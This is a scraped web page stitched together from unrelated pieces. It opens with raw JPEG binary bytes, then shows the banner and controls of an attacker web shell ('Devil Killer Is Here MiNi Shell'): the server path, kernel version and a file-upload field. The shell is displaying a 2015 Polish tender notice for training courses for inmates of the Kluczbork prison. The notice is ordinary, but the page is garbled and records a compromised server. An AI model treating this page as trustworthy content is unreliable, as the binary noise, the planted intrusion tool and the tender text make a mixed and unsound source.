JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150227/27363-N-2015.html

<p class="kh_header"><b>Kluczbork: rzedmiotem zamówienia są usługi, polegające na przeprowadzeniu 4 pakietów szkoleniowych, każdy pakiet składający się z 4 kursów szkoleniowych dla skazanych, osadzonych w Zakładzie Karnym w Kluczborku</b><br>
<b>Numer ogłoszenia: 27363 - 2015; data zamieszczenia: 27.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Katowicka 4, 46-200 Kluczbork, woj. opolskie, tel. 77 447 20 70, faks 77 417 21 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> rzedmiotem zamówienia są usługi, polegające na przeprowadzeniu 4 pakietów szkoleniowych, każdy pakiet składający się z 4 kursów szkoleniowych dla skazanych, osadzonych w Zakładzie Karnym w Kluczborku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi, polegające na przeprowadzeniu 4 pakietów szkoleniowych - 4 części zamówienia, każdy pakiet składający się z 4 kursów szkoleniowych dla skazanych, osadzonych w Zakładzie
Karnym w Kluczborku. CZEŚĆ I: Pakiet szkoleniowy, składający się z 4 kursów szkoleniowych dla 10 skazanych, osadzonych w Zakładzie Karnym w Kluczborku. Każdy z 10 uczestników szkolenia, w ramach pakietu, winien odbyć 1 szkolenie kursowe zawodowe - pilarz, 1 szkolenie z zakresu aktywizacji zawodowej, 1 szkolenie z problematyki ekologicznej oraz 1 szkolenie z zakresu profilaktyki alkoholowej. CZĘŚĆ II: Pakiet szkoleniowy, składający się z 4 kursów szkoleniowych dla 10 skazanych, osadzonych w Zakładzie Karnym w Kluczborku. Każdy z 10 uczestników szkolenia, w ramach pakietu, winien odbyć 1 szkolenie kursowe zawodowe - pilarz, 1 szkolenie z zakresu aktywizacji zawodowej, 1 szkolenie z problematyki ekologicznej oraz 1 szkolenie z dziedziny przeciwdziałania agresji. CZĘŚĆ III: Pakiet szkoleniowy, składający się z 4 kursów szkoleniowych dla 10 skazanych, osadzonych w Zakładzie Karnym w Kluczborku. Każdy z 10  czestników szkolenia, w ramach pakietu, winien odbyć 1 szkolenie kursowe zawodowe - pilarz, 1 szkolenie z zakresu aktywizacji zawodowej, 1 szkolenie z problematyki ekologicznej oraz 1 szkolenie z dziedziny rzeciwdziałania agresji. CZEŚĆ IV: Pakiet szkoleniowy, składający się z 4 kursów szkoleniowych dla 10 skazanych, osadzonych w Zakładzie Karnym w Kluczborku. Każdy z 10 uczestników szkolenia, w ramach pakietu, winien odbyć 1 szkolenie kursowe zawodowe - pilarz, 1 szkolenie z zakresu aktywizacji zawodowej, 1 szkolenie z problematyki ekologicznej oraz 1 szkolenie z zakresu profilaktyki alkoholowej. Kursy szkoleniowe zostaną zorganizowane w ramach realizacji działań szkoleniowych do Modułu 1.1 Działanie na rzecz ekologii w Projekcie nr 1 pn. Realizacja szkoleń podnoszących kompetencje społecznozawodowe więźniów oraz stworzenie warunków ułatwiających podtrzymanie więzi rodzinnych w celu zwiększenia efektywności ich powrotu do społeczeństwa po zakończeniu odbywania kary Programu PL 17 Norweskiego Mechanizmu Finansowego 2009-2014 pn. Wsparcie Służby Więziennej, w tym kary nieizolacyjne. 2. Warunki szczegółowe: CZĘŚĆ I: Szkolenie zawodowe o tematyce kurs pilarz, którego celem jest nabycie teoretycznych i praktycznych umiejętności do samodzielnej pracy na stanowisku pilarza oraz umiejętności posługiwania się kosą spalinową. a) czas trwania: 80 godzin dydaktycznych/osobę (1 godz. = 45 min), w tym: zajęcia teoretyczne: 30 godzin/osobę praktyczna nauka zawodu: 50 godzin/osobę b) zagadnienia: - zasady organizacji pracy na stanowisku roboczym, - przepisy bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej, - budowa i zasada funkcjonowania pilarek i kos spalinowych, - technika pracy pilarką i kosą spalinową,
- techniki ścinki i obalania drzew, - techniki okrzesywania i przerzynki drewna, - zasady konserwacji urządzeń. c) miejsce przeprowadzenia zajęć:
zajęcia teoretyczne: na terenie Zakładu Karnego w Kluczborku.
praktyczna nauka zawodu: na terenie Zakładu Karnego w Kluczborku.
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 - 14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
e) Zamawiający zapewni na potrzeby przedmiotowego szkolenia 5 szt. kos spalinowych OLEO-MAC BC 220 T i 5 szt. pił łańcuchowych spalinowych OLEO-MAC GS 350 C. f) Wykonawca pokryje wszystkie koszty związane z realizacją kursu, m.in.: - usługę szkoleniową,
- badanie lekarskie potwierdzające brak przeciwwskazań do wykonywania pracy na danym stanowisku dla 10 osadzonych oraz 2 osadzonych z listy rezerwowej.
- ubezpieczenie NW uczestników (na minimum 10 tys. zł)
- zakup odzieży roboczej i sprzętu ochronnego,
- zakup materiału niezbędnego do realizacji szkolenia zawodowego
- zakup materiałów dydaktycznych oraz przeznaczonych do praktycznej nauki zawodu,
- zakup materiałów eksploatacyjnych w postaci paliwa, oleju, części zamiennych itp.
- zakup wody mineralnej dla uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie
na jednego uczestnika.
g) Zamawiający wymaga, aby średnica drewna wykorzystywanego do nauki praktycznej zawodu wynosiła
min. 20 cm.
h) Drewno wykorzystane do praktycznej nauki zawodu stanowi własność Wykonawcy, który zobowiązany
jest po zakończeniu szkolenia wywieść je z terenu Zakładu Karnego w Kluczborku.
Szkolenie kompetencyjne z zakresu aktywizacji zawodowej, którego celem jest poznanie
podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy.
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) zagadnienia określone przez Ministerstwo Pracy i Polityki Społecznej, wynikające z programu Szkolenia
w klubie pracy, m.in.:
- autoprezentacja,
- komunikacja z pracodawcą,
- rozmowa kwalifikacyjna,
- dokumenty aplikacyjne,
- sposoby poszukiwania pracy,
- poznawanie i odkrywanie umiejętności oraz predyspozycji zawodowych.
c) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
e) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową, ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
Szkolenie ekologiczne (szkolenie kompetencyjne), którego celem jest poznanie podstawowych zagadnień z zakresu ekologii i ochrony środowiska.
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) zagadnienia:
- ochrona lasów i terenów zielonych,
- gospodarowanie odpadami komunalnymi i selektywnymi.
c) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej)
e) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
Szkolenie z zakresu profilaktyki alkoholowej, którego celem jest poznanie podstawowych
zagadnień z zakresu:
- Wpływ alkoholu na organizm,
- Ryzyko związane z używaniem alkoholu,
- Droga do uzależnienia,
- Objawy uzależnienia,
- Autodiagnoza,
- Szkody zdrowotne związane z używaniem alkoholu,
- Picie szkodliwe,
- Fazy uzależnienia,
- Formy pomocy osobą uzależnionym i nadużywającym alkoholu,
- Placówki leczenia odwykowego, formy terapii.
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
c) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
d) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
CZĘŚĆ II:
Szkolenie zawodowe o tematyce kurs pilarz, którego celem jest nabycie teoretycznych
i praktycznych umiejętności do samodzielnej pracy na stanowisku pilarza oraz umiejętności posługiwania się
kosą spalinową.
a) czas trwania: 80 godzin dydaktycznych/osobę (1 godz. = 45 min),
w tym:
zajęcia teoretyczne: 30 godzin/osobę
praktyczna nauka zawodu: 50 godzin/osobę
b) zagadnienia:
- zasady organizacji pracy na stanowisku roboczym,
- przepisy bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej,
- budowa i zasada funkcjonowania pilarek i kos spalinowych,
- technika pracy pilarką i kosą spalinową,
- techniki ścinki i obalania drzew,
- techniki okrzesywania i przerzynki drewna,
- zasady konserwacji urządzeń.
c) miejsce przeprowadzenia zajęć:
zajęcia teoretyczne: na terenie Zakładu Karnego w Kluczborku.
praktyczna nauka zawodu: na terenie Zakładu Karnego w Kluczborku.
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
e) Zamawiający zapewni na potrzeby przedmiotowego szkolenia 5 szt. kos spalinowych OLEO-MAC
BC 220 T i 5 szt. pił łańcuchowych spalinowych OLEO-MAC GS 350 C.
f) Wykonawca pokryje wszystkie koszty związane z realizacją kursu, m.in.:
- usługę szkoleniową,
- badanie lekarskie potwierdzające brak przeciwwskazań do wykonywania pracy na danym
stanowisku dla 10 osadzonych oraz 2 osadzonych z listy rezerwowej.
- ubezpieczenie NW uczestników (na minimum 10 tys. zł),
- zakup odzieży roboczej i sprzętu ochronnego,
- zakup materiału niezbędnego do realizacji szkolenia zawodowego
- zakup materiałów dydaktycznych oraz przeznaczonych do praktycznej nauki zawodu,
- zakup materiałów eksploatacyjnych w postaci paliwa, oleju, części zamiennych itp.
- zakup wody mineralnej dla uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie
na jednego uczestnika.
g) Zamawiający wymaga, aby średnica drewna wykorzystywanego do nauki praktycznej zawodu wynosiła
min. 20 cm.
h) Drewno wykorzystane do praktycznej nauki zawodu stanowi własność Wykonawcy, który zobowiązany
jest po zakończeniu szkolenia wywieść je z terenu Zakładu Karnego w Kluczborku.
Szkolenie kompetencyjne z zakresu aktywizacji zawodowej, którego celem jest poznanie
podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy.
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) zagadnienia określone przez Ministerstwo Pracy i Polityki Społecznej, wynikające z Programu Szkolenia
w klubie pracy, m.in.:
- autoprezentacja,
- komunikacja z pracodawcą,
- rozmowa kwalifikacyjna,
- dokumenty aplikacyjne,
- sposoby poszukiwania pracy,
- poznawanie i odkrywanie umiejętności oraz predyspozycji zawodowych.
c) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
e) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
Szkolenie ekologiczne (szkolenie kompetencyjne), którego celem jest poznanie
podstawowych zagadnień z zakresu ekologii i ochrony środowiska
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) zagadnienia:
- ochrona lasów i terenów zielonych,
- gospodarowanie odpadami komunalnymi i selektywnymi.
c) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej)
e) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
Szkolenie z dziedziny przeciwdziałania agresji, którego celem jest:
- utrwalenie wiedzy dotyczącej zjawiska agresji,
- doskonalenie umiejętności rozpoznawania emocji towarzyszących zachowaniom agresywnym,
- wskazanie pozytywnych sposobów, technik hamowania i rozładowania agresji,
- wypracowanie własnych sposobów redukowania agresji,
- kształtowanie poczucia własnej wartości,
- uświadomienie wpływu zachowań agresywnych na drugiego człowieka,
- skłanianie do refleksji nad własnym zachowaniem,
- zwiększenie kompetencji skazanych w zakresie rozwiązywania sytuacji trudnych
- kształtowanie umiejętności prospołecznych,
- kształtowanie postawy empatycznej,
- zwiększenie poczucia odpowiedzialności za siebie i własne zachowania,
- przełamanie schematów poznawczych reagowania w sytuacjach trudnych na korzyść zachowań
asertywnych,
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
c) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
d) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
CZĘŚĆ III:
Szkolenie zawodowe o tematyce kurs pilarz, którego celem jest nabycie teoretycznych
i praktycznych umiejętności do samodzielnej pracy na stanowisku pilarza oraz umiejętności posługiwania się
kosą spalinową.
a) czas trwania: 80 godzin dydaktycznych/osobę (1 godz. = 45 min),
w tym:
zajęcia teoretyczne: 30 godzin/osobę
praktyczna nauka zawodu: 50 godzin/osobę
b) zagadnienia:
- zasady organizacji pracy na stanowisku roboczym,
- przepisy bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej,
- budowa i zasada funkcjonowania pilarek i kos spalinowych,
- technika pracy pilarką i kosą spalinową,
- techniki ścinki i obalania drzew,
- techniki okrzesywania i przerzynki drewna,
- zasady konserwacji urządzeń.
c) miejsce przeprowadzenia zajęć:
zajęcia teoretyczne: na terenie Zakładu Karnego w Kluczborku.
praktyczna nauka zawodu: na terenie Zakładu Karnego w Kluczborku.
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
e) Zamawiający zapewni na potrzeby przedmiotowego szkolenia 5 szt. kos spalinowych OLEO-MAC
BC 220 T i 5 szt. pił łańcuchowych spalinowych OLEO-MAC GS 350 C.
f) Wykonawca pokryje wszystkie koszty związane z realizacją kursu, m.in.:
- usługę szkoleniową,
- badanie lekarskie potwierdzające brak przeciwwskazań do wykonywania pracy na danym
stanowisku dla 10 osadzonych oraz 2 osadzonych z listy rezerwowej.
- ubezpieczenie NW uczestników (na minimum 10 tys. zł),
- zakup odzieży roboczej i sprzętu ochronnego,
- zakup materiału niezbędnego do realizacji szkolenia zawodowego
- zakup materiałów dydaktycznych oraz przeznaczonych do praktycznej nauki zawodu,
- zakup materiałów eksploatacyjnych w postaci paliwa, oleju, części zamiennych itp.
- zakup wody mineralnej dla uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie
na jednego uczestnika.
g) Zamawiający wymaga, aby średnica drewna wykorzystywanego do nauki praktycznej zawodu wynosiła
min. 20 cm.
h) Drewno wykorzystane do praktycznej nauki zawodu stanowi własność Wykonawcy, który zobowiązany
jest po zakończeniu szkolenia wywieść je z terenu Zakładu Karnego w Kluczborku.
Szkolenie kompetencyjne z zakresu aktywizacji zawodowej, którego celem jest poznanie
podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy.
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) zagadnienia określone przez Ministerstwo Pracy i Polityki Społecznej, wynikające z Programu Szkolenia
w klubie pracy, m.in.:
- autoprezentacja,
- komunikacja z pracodawcą,
- rozmowa kwalifikacyjna,
- dokumenty aplikacyjne,
- sposoby poszukiwania pracy,
- poznawanie i odkrywanie umiejętności oraz predyspozycji zawodowych.
c) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
e) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
Szkolenie ekologiczne (szkolenie kompetencyjne), którego celem jest poznanie
podstawowych zagadnień z zakresu ekologii i ochrony środowiska
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) zagadnienia:
- ochrona lasów i terenów zielonych,
- gospodarowanie odpadami komunalnymi i selektywnymi.
c) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej)
e) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
Szkolenie z dziedziny przeciwdziałania agresji, którego celem jest:
- utrwalenie wiedzy dotyczącej zjawiska agresji,
- doskonalenie umiejętności rozpoznawania emocji towarzyszących zachowaniom agresywnym,
- wskazanie pozytywnych sposobów, technik hamowania i rozładowania agresji,
- wypracowanie własnych sposobów redukowania agresji,
- kształtowanie poczucia własnej wartości,
- uświadomienie wpływu zachowań agresywnych na drugiego człowieka,
- skłanianie do refleksji nad własnym zachowaniem,
- zwiększenie kompetencji skazanych w zakresie rozwiązywania sytuacji trudnych
- kształtowanie umiejętności prospołecznych,
- kształtowanie postawy empatycznej,
- zwiększenie poczucia odpowiedzialności za siebie i własne zachowania,
- przełamanie schematów poznawczych reagowania w sytuacjach trudnych na korzyść zachowań
asertywnych,
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
c) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
d) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie na jednego uczestnika.
CZĘŚĆ IV:
Szkolenie zawodowe o tematyce kurs pilarz, którego celem jest nabycie teoretycznych
i praktycznych umiejętności do samodzielnej pracy na stanowisku pilarza oraz umiejętności
posługiwania się kosą spalinową.
a) czas trwania: 80 godzin dydaktycznych/osobę (1 godz. = 45 min),
w tym:
zajęcia teoretyczne: 30 godzin/osobę
praktyczna nauka zawodu: 50 godzin/osobę
b) zagadnienia:
- zasady organizacji pracy na stanowisku roboczym,
- przepisy bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej,
- budowa i zasada funkcjonowania pilarek i kos spalinowych,
- technika pracy pilarką i kosą spalinową,
- techniki ścinki i obalania drzew,
- techniki okrzesywania i przerzynki drewna,
- zasady konserwacji urządzeń.
c) miejsce przeprowadzenia zajęć:
zajęcia teoretyczne: na terenie Zakładu Karnego w Kluczborku.
praktyczna nauka zawodu: na terenie Zakładu Karnego w Kluczborku.
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
e) Zamawiający zapewni na potrzeby przedmiotowego szkolenia 5 szt. kos spalinowych OLEO-MAC
BC 220 T i 5 szt. pił łańcuchowych spalinowych OLEO-MAC GS 350 C.
f) Wykonawca pokryje wszystkie koszty związane z realizacją kursu, m.in.:
- usługę szkoleniową,
- badanie lekarskie potwierdzające brak przeciwwskazań do wykonywania pracy na danym
stanowisku dla 10 osadzonych oraz 2 osadzonych z listy rezerwowej.
- ubezpieczenie NW uczestników (na minimum 10 tys. zł),
- zakup odzieży roboczej i sprzętu ochronnego,
- zakup materiału niezbędnego do realizacji szkolenia zawodowego
- zakup materiałów dydaktycznych oraz przeznaczonych do praktycznej nauki zawodu,
- zakup materiałów eksploatacyjnych w postaci paliwa, oleju, części zamiennych itp.
- zakup wody mineralnej dla uczestników szkolenia w trakcie trwania zajęć w ilości 1,5 litra dziennie
na jednego uczestnika.
g) Zamawiający wymaga, aby średnica drewna wykorzystywanego do nauki praktycznej zawodu wynosiła
min. 20 cm.
h) Drewno wykorzystane do praktycznej nauki zawodu stanowi własność Wykonawcy, który zobowiązany
jest po zakończeniu szkolenia wywieść je z terenu Zakładu Karnego w Kluczborku.
Szkolenie kompetencyjne z zakresu aktywizacji zawodowej, którego celem jest poznanie
podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy.
a) czas trwania: 20 godzin dydaktycznych/osobę (1 godz. = 45 min.)
b) zagadnienia określone przez Ministerstwo Pracy i Polityki Społecznej, wynikające z programu Szkolenia
w klubie pracy, m.in.:
- autoprezentacja,
- komunikacja z pracodawcą,
- rozmowa kwalifikacyjna,
- dokumenty aplikacyjne,
- sposoby poszukiwania pracy,
- poznawanie i odkrywanie umiejętności oraz predyspozycji zawodowych.
c) miejsce przeprowadzenia zajęć: na terenie Zamawiającego
d) maksymalny dzienny wymiar szkolenia: 8 godzin dydaktycznych (przerwa obiadowa w godzinach 12:30 -
14:00 - Zamawiający zapewnia przerwę obiadową, Zamawiający nie przewiduje przerwy kawowej),
e) Wykonawca pokryje wszystkie koszty związane z realizacją szkolenia tj.: usługę szkoleniową,
ubezpieczenie NW uczestników, zakup materiałów dydaktycznych oraz zakup wody mineralnej dla
